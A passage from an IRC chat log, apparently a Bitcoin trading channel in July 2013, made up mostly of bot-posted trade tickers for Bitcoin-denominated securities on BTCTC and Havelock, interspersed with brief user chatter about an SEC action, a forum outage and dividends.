0.8256 BTC [-] Jul 25 00:18:35 more important than sec news was yesterdays dilbert Jul 25 00:19:49 Burnside wakes up a little https://bitcointalk.org/index.php?topic=261235.msg2797507#msg2797507 Jul 25 00:20:58 Man I just smoked like 10 cigs Jul 25 00:21:11 [BTCTC] [AMC-PT] 500 @ 0.0032 = 1.6 BTC [-] Jul 25 00:22:06 [BTCTC] [AMC-PT] 241 @ 0.0032 = 0.7712 BTC [-] Jul 25 00:23:58 ;;nethash Jul 25 00:23:59 236418.288477 Jul 25 00:24:02 booo Jul 25 00:24:14 [HAVELOCK] [AM100] 10 @ 0.043 = 0.43 BTC [+] Jul 25 00:25:31 [HAVELOCK] [AM100] 35 @ 0.043 = 1.505 BTC [+] Jul 25 00:25:37 [HAVELOCK] [HIM] 1 @ 0.2241 BTC [-] Jul 25 00:25:40 [HAVELOCK] [HIM] 1 @ 0.22405 BTC [-] Jul 25 00:25:42 [HAVELOCK] [HIM] 1 @ 0.2211 BTC [-] Jul 25 00:25:45 [HAVELOCK] [HIM] 3 @ 0.22100001 = 0.663 BTC [-] Jul 25 00:26:35 [HAVELOCK] [AM100] 90 @ 0.0422932 = 3.8064 BTC [-] Jul 25 00:26:57 [HAVELOCK] [AM1] 1 @ 4.61 BTC [-] Jul 25 00:27:36 [BTCTC] [AMC-PT] 4 @ 0.003377 = 0.0135 BTC [+] Jul 25 00:27:53 [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [+] Jul 25 00:28:42 [BTCTC] [ASICMINER-PT] 2 @ 4.51 = 9.02 BTC [-] Jul 25 00:28:45 [BTCTC] [S.MPOE-PT] 3 @ 0.000934 = 0.0028 BTC [+] Jul 25 00:29:53 [HAVELOCK] [HIM] 4 @ 0.247 = 0.988 BTC [+] Jul 25 00:29:59 [HAVELOCK] [AM100] 1 @ 0.043 BTC [+] Jul 25 00:30:02 [HAVELOCK] [HIM] 1 @ 0.248 BTC [+] Jul 25 00:30:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04589 BTC [+] Jul 25 00:30:54 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Jul 25 00:31:59 [BTCTC] [KENILWORTH] 10 @ 0.0018 = 0.018 BTC [-] Jul 25 00:32:04 [BTCTC] [DMS.SELLING] 2 @ 0.01998 = 0.04 BTC [+] Jul 25 00:32:07 [BTCTC] [DMS.MINING] 50 @ 0.0143 = 0.715 BTC [+] Jul 25 00:32:10 [BTCTC] [DMS.MINING] 200 @ 0.01446 = 2.892 BTC [+] Jul 25 00:32:39 [BTCTC] [DMS.MINING] 250 @ 0.0139 = 3.475 BTC [-] Jul 25 00:33:46 [HAVELOCK] [AM100] 1 @ 0.043 BTC [+] Jul 25 00:34:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.04346 = 0.4346 BTC [-] Jul 25 00:35:37 [BTCTC] [BASIC-MINING] 5 @ 0.48 = 2.4 BTC [+] Jul 25 00:35:37 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] Jul 25 00:36:12 [BTCTC] [DMS.MINING] 1 @ 0.01457 BTC [+] Jul 25 00:37:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003208 BTC [+] Jul 25 00:37:38 [HAVELOCK] [AM100] 10 @ 0.0422932 = 0.4229 BTC [-] Jul 25 00:38:03 [BTCTC] [TAT.ASICMINER] 9 @ 0.04346 = 0.3911 BTC [-] Jul 25 00:38:28 [BTCTC] [AMC-PT] 50 @ 0.003375 = 0.1688 BTC [-] Jul 25 00:38:30 [BTCTC] [AMC-PT] 86 @ 0.003376 = 0.2903 BTC [+] Jul 25 00:38:36 [HAVELOCK] [AM100] 1 @ 0.043 BTC [+] Jul 25 00:39:01 [BTCTC] [ASICMINER-PT] 1 @ 4.52 BTC [+] Jul 25 00:39:02 [BTCTC] [ASICMINER-PT] 2 @ 4.51 = 9.02 BTC [-] Jul 25 00:39:04 [BTCTC] [ASICMINER-PT] 1 @ 4.501 BTC [-] Jul 25 00:39:10 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 25 00:39:12 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 25 00:40:46 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 25 00:40:46 [BTCTC] [ASICMINER-PT] 8 @ 4.5 = 36 BTC [-] Jul 25 00:40:58 [HAVELOCK] [AM1] 1 @ 4.542 BTC [-] Jul 25 00:41:01 [HAVELOCK] [AM1] 1 @ 4.541 BTC [-] Jul 25 00:41:02 [HAVELOCK] [AM1] 2 @ 4.54 = 9.08 BTC [-] Jul 25 00:41:27 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [+] Jul 25 00:41:28 [BTCTC] [BASIC-MINING] 3 @ 0.5 = 1.5 BTC [+] Jul 25 00:41:45 [BTCTC] [BASIC-MINING] 2 @ 0.4302 = 0.8604 BTC [-] Jul 25 00:42:14 [BTCTC] [ASICMINER-PT] 5 @ 4.489 = 22.445 BTC [-] Jul 25 00:42:40 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [+] Jul 25 00:42:42 [BTCTC] [BASIC-MINING] 1 @ 0.527 BTC [+] Jul 25 00:42:44 [BTCTC] [BASIC-MINING] 1 @ 0.529 BTC [+] Jul 25 00:42:45 [BTCTC] [BASIC-MINING] 1 @ 0.5392 BTC [+] Jul 25 00:45:06 [HAVELOCK] [AM100] 2 @ 0.04389976 = 0.0878 BTC [+] Jul 25 00:45:11 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 25 00:45:31 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 25 00:45:50 [BTCTC] [ASICMINER-PT] 2 @ 4.41 = 8.82 BTC [-] Jul 25 00:45:50 [BTCTC] [ASICMINER-PT] 3 @ 4.41 = 13.23 BTC [-] Jul 25 00:45:50 [BTCTC] [DMS.SELLING] 3 @ 0.01998 = 0.0599 BTC [+] Jul 25 00:45:52 [BTCTC] [ASICMINER-PT] 1 @ 4.402 BTC [-] Jul 25 00:45:53 [BTCTC] [ASICMINER-PT] 1 @ 4.401 BTC [-] Jul 25 00:45:56 [BTCTC] [ASICMINER-PT] 1 @ 4.401 BTC [-] Jul 25 00:45:59 [BTCTC] [ASICMINER-PT] 4 @ 4.401 = 17.604 BTC [-] Jul 25 00:46:04 [HAVELOCK] [SMG] 65 @ 0.00026999 = 0.0175 BTC [-] Jul 25 00:46:07 [BTCTC] [ASICMINER-PT] 7 @ 4.4 = 30.8 BTC [-] Jul 25 00:46:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.04345 = 0.3042 BTC [-] Jul 25 00:46:49 [BTCTC] [TAT.ASICMINER] 90 @ 0.0434 = 3.906 BTC [-] Jul 25 00:46:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0434 = 0.1302 BTC [-] Jul 25 00:47:07 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [-] Jul 25 00:47:14 [BTCTC] [ASICMINER-PT] 8 @ 4.4 = 35.2 BTC [-] Jul 25 00:47:26 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 25 00:47:27 [BTCTC] [ASICMINER-PT] 1 @ 4.390006 BTC [-] Jul 25 00:47:32 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [-] Jul 25 00:47:34 [BTCTC] [ASICMINER-PT] 8 @ 4.32 = 34.56 BTC [-] Jul 25 00:47:36 [BTCTC] [ASICMINER-PT] 5 @ 4.3 = 21.5 BTC [-] Jul 25 00:47:37 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 25 00:47:39 [BTCTC] [ASICMINER-PT] 3 @ 4.3 = 12.9 BTC [-] Jul 25 00:47:51 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 25 00:48:17 [HAVELOCK] [AM1] 8 @ 4.54 = 36.32 BTC [-] Jul 25 00:48:20 [HAVELOCK] [AM1] 3 @ 4.531 = 13.593 BTC [-] Jul 25 00:48:22 [HAVELOCK] [AM1] 2 @ 4.5249 = 9.0498 BTC [-] Jul 25 00:48:24 [HAVELOCK] [AM1] 2 @ 4.5 = 9 BTC [-] Jul 25 00:48:26 [HAVELOCK] [AM1] 2 @ 4.39 = 8.78 BTC [-] Jul 25 00:48:28 [HAVELOCK] [AM1] 1 @ 4.3701 BTC [-] Jul 25 00:48:30 [HAVELOCK] [AM1] 1 @ 4.32 BTC [-] Jul 25 00:48:33 [HAVELOCK] [AM1] 1 @ 4.31 BTC [-] Jul 25 00:48:35 [BTCTC] [BFMINES] 77 @ 0.003201 = 0.2465 BTC [-] Jul 25 00:48:41 [BTCTC] [DMS.SELLING] 1 @ 0.01997 BTC [-] Jul 25 00:48:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0434 BTC [-] Jul 25 00:48:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.043326 = 0.8665 BTC [-] Jul 25 00:48:55 am div was? Jul 25 00:49:09 [BTCTC] [TAT.ASICMINER] 27 @ 0.043306 = 1.1693 BTC [-] Jul 25 00:49:12 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [-] Jul 25 00:49:13 .024 Jul 25 00:49:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.0433 = 0.2598 BTC [-] Jul 25 00:49:15 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 25 00:49:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.043001 = 0.43 BTC [-] Jul 25 00:49:19 [BTCTC] [ASICMINER-PT] 1 @ 4.220667 BTC [-] Jul 25 00:49:24 ty Jul 25 00:49:28 [BTCTC] [TAT.ASICMINER] 9 @ 0.043 = 0.387 BTC [-] Jul 25 00:49:39 [BTCTC] [ASICMINER-PT] 10 @ 4.220666 = 42.2067 BTC [-] Jul 25 00:49:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [-] Jul 25 00:49:45 [BTCTC] [ASICMINER-PT] 1 @ 4.2001 BTC [-] Jul 25 00:49:46 [BTCTC] [TAT.ASICMINER] 70 @ 0.043 = 3.01 BTC [-] Jul 25 00:49:48 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 25 00:49:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [-] Jul 25 00:49:51 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 25 00:50:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.0429 = 0.0858 BTC [-] Jul 25 00:50:15 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 25 00:50:47 [BTCTC] [AMC-PT] 1400 @ 0.003275 = 4.585 BTC [-] Jul 25 00:50:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.042702 = 0.2562 BTC [-] Jul 25 00:50:47 [BTCTC] [ASICMINER-PT] 1 @ 4.145 BTC [-] Jul 25 00:51:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.04265 = 0.1706 BTC [-] Jul 25 00:51:00 [BTCTC] [ASICMINER-PT] 5 @ 4.123451 = 20.6173 BTC [-] Jul 25 00:51:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.04265 = 0.1706 BTC [-] Jul 25 00:51:59 [BTCTC] [TAT.ASICMINER] 34 @ 0.04265 = 1.4501 BTC [-] Jul 25 00:51:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.04265 = 0.5118 BTC [-] Jul 25 00:51:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04252 BTC [-] Jul 25 00:52:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.042501 = 1.275 BTC [-] Jul 25 00:52:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.04218 = 0.4218 BTC [-] Jul 25 00:52:06 [BTCTC] [TAT.ASICMINER] 30 @ 0.042002 = 1.2601 BTC [-] Jul 25 00:52:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.042001 BTC [-] Jul 25 00:52:10 [BTCTC] [TAT.ASICMINER] 46 @ 0.042 = 1.932 BTC [-] Jul 25 00:52:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 25 00:52:17 [HAVELOCK] [AM100] 2 @ 0.0438499 = 0.0877 BTC [-] Jul 25 00:52:24 [BTCTC] [AMC-PT] 67 @ 0.00321 = 0.2151 BTC [-] Jul 25 00:52:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [-] Jul 25 00:52:40 [BTCTC] [AMC-PT] 13 @ 0.00321 = 0.0417 BTC [-] Jul 25 00:52:42 [BTCTC] [AMC-PT] 25 @ 0.003208 = 0.0802 BTC [-] Jul 25 00:52:44 [BTCTC] [AMC-PT] 82 @ 0.0032 = 0.2624 BTC [-] Jul 25 00:52:55 [HAVELOCK] [AM100] 2 @ 0.04250001 = 0.085 BTC [-] Jul 25 00:52:58 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [-] Jul 25 00:52:59 [HAVELOCK] [AM100] 68 @ 0.0420001 = 2.856 BTC [-] Jul 25 00:53:34 [BTCTC] [AMC-PT] 19 @ 0.003211 = 0.061 BTC [+] Jul 25 00:54:32 [BTCTC] [AMC-PT] 127 @ 0.0032 = 0.4064 BTC [-] Jul 25 00:54:33 [BTCTC] [AMC-PT] 4 @ 0.0032 = 0.0128 BTC [-] Jul 25 00:54:58 [HAVELOCK] [AM100] 2 @ 0.0438499 = 0.0877 BTC [+] Jul 25 00:55:47 [BTCTC] [ASICMINER-PT] 1 @ 4.12 BTC [-] Jul 25 00:56:05 [BTCTC] [ASICMINER-PT] 3 @ 4.12 = 12.36 BTC [-] Jul 25 00:56:10 [BTCTC] [ASICMINER-PT] 5 @ 4.111101 = 20.5555 BTC [-] Jul 25 00:56:11 [BTCTC] [ASICMINER-PT] 1 @ 4.111 BTC [-] Jul 25 00:56:26 [BTCTC] [ASICMINER-PT] 1 @ 4.1051 BTC [-] Jul 25 00:56:30 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 25 00:56:34 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [-] Jul 25 00:56:37 [BTCTC] [ASICMINER-PT] 5 @ 4.04 = 20.2 BTC [-] Jul 25 00:56:39 [BTCTC] [ASICMINER-PT] 10 @ 4.03 = 40.3 BTC [-] Jul 25 00:56:42 [BTCTC] [ASICMINER-PT] 5 @ 4.02 = 20.1 BTC [-] Jul 25 00:56:44 [BTCTC] [ASICMINER-PT] 12 @ 4.011 = 48.132 BTC [-] Jul 25 00:56:46 [BTCTC] [ASICMINER-PT] 7 @ 4.003 = 28.021 BTC [-] Jul 25 00:56:51 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Jul 25 00:56:57 [BTCTC] [ASICMINER-PT] 21 @ 4 = 84 BTC [-] Jul 25 00:59:23 [HAVELOCK] [AM100] 7 @ 0.0420001 = 0.294 BTC [-] Jul 25 00:59:23 [HAVELOCK] [AM100] 1 @ 0.042 BTC [-] Jul 25 00:59:24 [HAVELOCK] [AM100] 5 @ 0.0419 = 0.2095 BTC [-] Jul 25 00:59:28 [HAVELOCK] [AM100] 2 @ 0.04181101 = 0.0836 BTC [-] Jul 25 00:59:29 [HAVELOCK] [AM100] 39 @ 0.04181101 = 1.6306 BTC [-] Jul 25 00:59:30 [HAVELOCK] [AM100] 96 @ 0.041811 = 4.0139 BTC [-] Jul 25 00:59:39 [HAVELOCK] [AM100] 4 @ 0.041811 = 0.1672 BTC [-] Jul 25 00:59:41 [HAVELOCK] [AM100] 1 @ 0.04179999 BTC [-] Jul 25 00:59:45 [HAVELOCK] [AM100] 5 @ 0.0417 = 0.2085 BTC [-] Jul 25 00:59:46 [HAVELOCK] [AM100] 4 @ 0.04150001 = 0.166 BTC [-] Jul 25 00:59:48 [HAVELOCK] [AM100] 53 @ 0.04100801 = 2.1734 BTC [-] Jul 25 00:59:50 [HAVELOCK] [AM100] 4 @ 0.04100701 = 0.164 BTC [-] Jul 25 00:59:52 [HAVELOCK] [AM100] 29 @ 0.041 = 1.189 BTC [-] Jul 25 01:01:12 [HAVELOCK] [AM1] 1 @ 4.25 BTC [-] Jul 25 01:01:38 [BTCTC] [ASICMINER-PT] 5 @ 4.499 = 22.495 BTC [+] Jul 25 01:01:43 [BTCTC] [ASICMINER-PT] 1 @ 4.499 BTC [+] Jul 25 01:02:27 [HAVELOCK] [AM100] 21 @ 0.041 = 0.861 BTC [-] Jul 25 01:02:28 [BTCTC] [ASICMINER-PT] 1 @ 4.141 BTC [-] Jul 25 01:02:29 [HAVELOCK] [AM100] 1 @ 0.041 BTC [-] Jul 25 01:03:23 [BTCTC] [AMC-PT] 1 @ 0.00321 BTC [+] Jul 25 01:03:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.041702 BTC [-] Jul 25 01:03:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.041702 = 0.1251 BTC [-] Jul 25 01:04:36 [HAVELOCK] [AM100] 600 @ 0.0411 = 24.66 BTC [+] Jul 25 01:04:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.04171 = 0.4171 BTC [+] Jul 25 01:05:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.0417 = 0.1251 BTC [-] Jul 25 01:05:05 [BTCTC] [ASICMINER-PT] 4 @ 4.5 = 18 BTC [+] Jul 25 01:05:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.04171 = 0.1251 BTC [+] Jul 25 01:06:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.04161 = 0.1248 BTC [-] Jul 25 01:07:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.04171 = 0.1668 BTC [+] Jul 25 01:07:17 [HAVELOCK] [AM100] 1 @ 0.04384888 BTC [+] Jul 25 01:09:06 [BTCTC] [TAT.ASICMINER] 58 @ 0.04168 = 2.4174 BTC [-] Jul 25 01:09:24 [BTCTC] [ASICMINER-PT] 2 @ 4.48 = 8.96 BTC [-] Jul 25 01:10:07 [BTCTC] [COGNITIVE] 2 @ 0.57 = 1.14 BTC [+] Jul 25 01:10:40 [BTCTC] [TAT.ASICMINER] 188 @ 0.04168 = 7.8358 BTC [-] Jul 25 01:11:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0417 BTC [+] Jul 25 01:11:04 [BTCTC] [TAT.ASICMINER] 19 @ 0.04171 = 0.7925 BTC [+] Jul 25 01:11:08 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 25 01:11:09 anybody selling out from btct.co? Jul 25 01:11:45 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 25 01:11:52 by the looks of it some are. Jul 25 01:12:32 mircea_popescu: with all due respect I think the owner is panicking and not acting rational Jul 25 01:12:40 he should of contacted the lawyer Jul 25 01:12:44 a* Jul 25 01:13:09 mircea_popescu: what was the URL to your blog? Jul 25 01:13:15 trilema.com Jul 25 01:13:23 [BTCTC] [AMC-PT] 52 @ 0.003353 = 0.1744 BTC [+] Jul 25 01:13:27 [BTCTC] [AMC-PT] 52 @ 0.003353 = 0.1744 BTC [+] Jul 25 01:13:32 [BTCTC] [AMC-PT] 80 @ 0.003363 = 0.269 BTC [+] Jul 25 01:13:34 [BTCTC] [AMC-PT] 25 @ 0.003363 = 0.0841 BTC [+] Jul 25 01:13:55 [BTCTC] [BASIC-MINING] 5 @ 0.49 = 2.45 BTC [-] Jul 25 01:14:55 you notice there is no selling of mpex pt or mpex listings Jul 25 01:15:07 [BTCTC] [AMC-PT] 7 @ 0.003374 = 0.0236 BTC [+] Jul 25 01:15:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.04346 BTC [+] Jul 25 01:15:10 [BTCTC] [AMC-PT] 15 @ 0.003377 = 0.0507 BTC [+] Jul 25 01:15:14 [BTCTC] [AMC-PT] 30 @ 0.003387 = 0.1016 BTC [+] Jul 25 01:15:38 [BTCTC] [AMC-PT] 30 @ 0.00339 = 0.1017 BTC [+] Jul 25 01:15:38 [BTCTC] [AMC-PT] 30 @ 0.00339 = 0.1017 BTC [+] Jul 25 01:15:38 [BTCTC] [AMC-PT] 12 @ 0.003393 = 0.0407 BTC [+] Jul 25 01:15:39 [BTCTC] [AMC-PT] 25 @ 0.003396 = 0.0849 BTC [+] Jul 25 01:16:09 [BTCTC] [KENILWORTH] 5000 @ 0.0018 = 9 BTC [-] Jul 25 01:17:08 [BTCTC] [AMC-PT] 1 @ 0.003417 BTC [+] Jul 25 01:19:09 [BTCTC] [AMC-PT] 4 @ 0.003417 = 0.0137 BTC [+] Jul 25 01:19:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.04346 = 0.1304 BTC [+] Jul 25 01:20:39 [BTCTC] [AMC-PT] 19 @ 0.00342 = 0.065 BTC [+] Jul 25 01:20:41 [BTCTC] [TAT.ASICMINER] 32 @ 0.04346 = 1.3907 BTC [+] Jul 25 01:21:10 [BTCTC] [ASICMINER-PT] 2 @ 4.48 = 8.96 BTC [+] Jul 25 01:22:05 [BTCTC] [BASIC-MINING] 1 @ 0.49 BTC [-] Jul 25 01:22:15 [BTCTC] [COGNITIVE] 1 @ 0.5875 BTC [+] Jul 25 01:22:30 [BTCTC] [COGNITIVE] 1 @ 0.5875 BTC [+] Jul 25 01:22:39 [BTCTC] [AMC-PT] 2 @ 0.003446 = 0.0069 BTC [+] Jul 25 01:22:47 [BTCTC] [DMS.SELLING] 33 @ 0.01811 = 0.5976 BTC [-] Jul 25 01:23:44 [BTCTC] [DMS.MINING] 39 @ 0.0143 = 0.5577 BTC [-] Jul 25 01:23:47 [BTCTC] [DMS.MINING] 10 @ 0.01445 = 0.1445 BTC [+] Jul 25 01:25:48 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 01:25:49 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [-] Jul 25 01:26:03 [BTCTC] [ASICMINER-PT] 7 @ 4.201 = 29.407 BTC [-] Jul 25 01:26:03 [HAVELOCK] [AM100] 2 @ 0.0438199 = 0.0876 BTC [-] Jul 25 01:26:05 [BTCTC] [ASICMINER-PT] 1 @ 4.201 BTC [-] Jul 25 01:26:09 [BTCTC] [ASICMINER-PT] 2 @ 4.201 = 8.402 BTC [-] Jul 25 01:27:30 [BTCTC] [TAT.MINIGAME] 1 @ 0.00027 BTC [+] Jul 25 01:28:48 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [+] Jul 25 01:28:50 [HAVELOCK] [AM100] 5 @ 0.0437 = 0.2185 BTC [-] Jul 25 01:29:08 [BTCTC] [RSM] 1 @ 0.0167 BTC [+] Jul 25 01:31:56 [BTCTC] [BITVPS] 1 @ 0.002195 BTC [+] Jul 25 01:33:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.04587 = 0.6881 BTC [+] Jul 25 01:33:25 go go gadget forum Jul 25 01:33:49 SEC has closed the forum, exchanges next, panic sell plox Jul 25 01:33:56 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 25 01:34:17 [BTCTC] [BITVPS] 1 @ 0.002195 BTC [+] Jul 25 01:34:27 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [+] Jul 25 01:34:32 lol theymos shouldf totally close down the forum for the day, just put up an empty page going Jul 25 01:34:33 the forum was literally just up Jul 25 01:34:39 "account information will be released soon" Jul 25 01:35:02 glbse 3.0 :P Jul 25 01:35:19 [BTCTC] [S.MPOE-PT] 1 @ 0.000934 BTC [+] Jul 25 01:35:33 thestringpuller!*@* added to ignore list. Jul 25 01:35:41 [HAVELOCK] [AM100] 1 @ 0.0434 BTC [-] Jul 25 01:35:41 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [+] Jul 25 01:35:46 It's nice to see the recovery Jul 25 01:36:17 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Jul 25 01:36:39 Almost doubled my stake in amc alone lol Jul 25 01:36:45 [HAVELOCK] [AM100] 20 @ 0.043399 = 0.868 BTC [-] Jul 25 01:37:21 [BTCTC] [AMC-PT] 9 @ 0.003442 = 0.031 BTC [-] Jul 25 01:37:37 good luck with that Jul 25 01:37:55 [BTCTC] [AMC-PT] 25 @ 0.003443 = 0.0861 BTC [+] Jul 25 01:38:07 It's been making me good coin so far. Not in it for the long run Jul 25 01:38:21 [BTCTC] [AMC-PT] 88 @ 0.003445 = 0.3032 BTC [+] Jul 25 01:38:24 [BTCTC] [AMC-PT] 100 @ 0.003448 = 0.3448 BTC [+] Jul 25 01:38:29 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [+] Jul 25 01:38:30 [BTCTC] [AMC-PT] 143 @ 0.003449 = 0.4932 BTC [+] Jul 25 01:38:34 [BTCTC] [ASICMINER-PT] 8 @ 4.48 = 35.84 BTC [+] Jul 25 01:38:34 rulother-tab it pays a dividend ? Jul 25 01:38:38 [BTCTC] [ASICMINER-PT] 1 @ 4.54 BTC [+] Jul 25 01:38:42 [BTCTC] [ASICMINER-PT] 7 @ 4.598 = 32.186 BTC [+] Jul 25 01:38:46 [BTCTC] [ASICMINER-PT] 3 @ 4.599 = 13.797 BTC [+] Jul 25 01:38:49 Yeah once a week, I've missed it twice so far. Jul 25 01:38:49 [BTCTC] [AMC-PT] 19 @ 0.003449 = 0.0655 BTC [+] Jul 25 01:38:50 [BTCTC] [ASICMINER-PT] 10 @ 4.6 = 46 BTC [+] Jul 25 01:38:53 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 25 01:39:04 what does it pay a dividend on ? i wasn't aware it actually had mining Jul 25 01:39:19 Supposedly they are Jul 25 01:39:23 [BTCTC] [GSDPT] 7 @ 0.003498 = 0.0245 BTC [+] Jul 25 01:39:37 wtf Jul 25 01:39:53 Probably off sales though Jul 25 01:39:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.04586 BTC [-] Jul 25 01:40:26 i don't get it. Jul 25 01:40:47 [BTCTC] [DMS.SELLING] 7 @ 0.01998 = 0.1399 BTC [+] Jul 25 01:40:58 [BTCTC] [ASICMINER-PT] 1 @ 4.669 BTC [+] Jul 25 01:40:58 Feds put heat on Web firms for master encryption keys | Politics and Law - CNET News Jul 25 01:41:00 [BTCTC] [ASICMINER-PT] 1 @ 4.675 BTC [+] Jul 25 01:41:03 [BTCTC] [ASICMINER-PT] 9 @ 4.685 = 42.165 BTC [+] Jul 25 01:41:05 you dont get ponzis? Jul 25 01:41:35 Its a real problem Jul 25 01:41:37 [BTCTC] [DMS.MINING] 2 @ 0.01405 = 0.0281 BTC [-] Jul 25 01:41:39 Similar to how part of am's dividend comes from sales. But I wouldn't doubt that either dub lol Jul 25 01:42:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003212 BTC [+] Jul 25 01:42:56 [BTCTC] [DMS.SELLING] 1 @ 0.01998 BTC [+] Jul 25 01:43:44 [BTCTC] [GSDPT] 55 @ 0.003423 = 0.1883 BTC [-] Jul 25 01:44:20 [BTCTC] [DMS.MINING] 98 @ 0.01405 = 1.3769 BTC [-] Jul 25 01:44:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04585 BTC [-] Jul 25 01:45:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.04585 = 0.2293 BTC [-] Jul 25 01:45:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.04585 = 0.1376 BTC [-] Jul 25 01:45:58 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 25 01:45:59 [BTCTC] [AMC-PT] 54 @ 0.003448 = 0.1862 BTC [-] Jul 25 01:46:05 [HAVELOCK] [AM100] 10 @ 0.0425 = 0.425 BTC [-] Jul 25 01:46:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.04585 = 0.1834 BTC [-] Jul 25 01:46:24 [HAVELOCK] [AM100] 50 @ 0.0429999 = 2.15 BTC [+] Jul 25 01:46:32 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 25 01:47:40 [HAVELOCK] [AM100] 2 @ 0.043 = 0.086 BTC [+] Jul 25 01:48:43 [HAVELOCK] [AM100] 40 @ 0.0428 = 1.712 BTC [-] Jul 25 01:49:04 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 25 01:49:11 [BTCTC] [ASICMINER-PT] 3 @ 4.43 = 13.29 BTC [-] Jul 25 01:49:21 The operation succeeded. Jul 25 01:49:24 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 25 01:49:26 [BTCTC] [ASICMINER-PT] 2 @ 4.41 = 8.82 BTC [-] Jul 25 01:49:30 [HAVELOCK] [AM100] 100 @ 0.04309999 = 4.31 BTC [+] Jul 25 01:50:10 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 25 01:50:45 Nice Jul 25 01:50:50 Dammit Jul 25 01:51:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0458 = 0.1374 BTC [-] Jul 25 01:51:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.044 = 0.088 BTC [-] Jul 25 01:51:33 [HAVELOCK] [SMG] 10 @ 0.00027 = 0.0027 BTC [+] Jul 25 01:51:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 25 01:51:38 [HAVELOCK] [SDSTM] 1 @ 0.01084899 BTC [+] Jul 25 01:51:41 [BTCTC] [TAT.ASICMINER] 21 @ 0.044 = 0.924 BTC [-] Jul 25 01:51:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 25 01:51:51 [HAVELOCK] 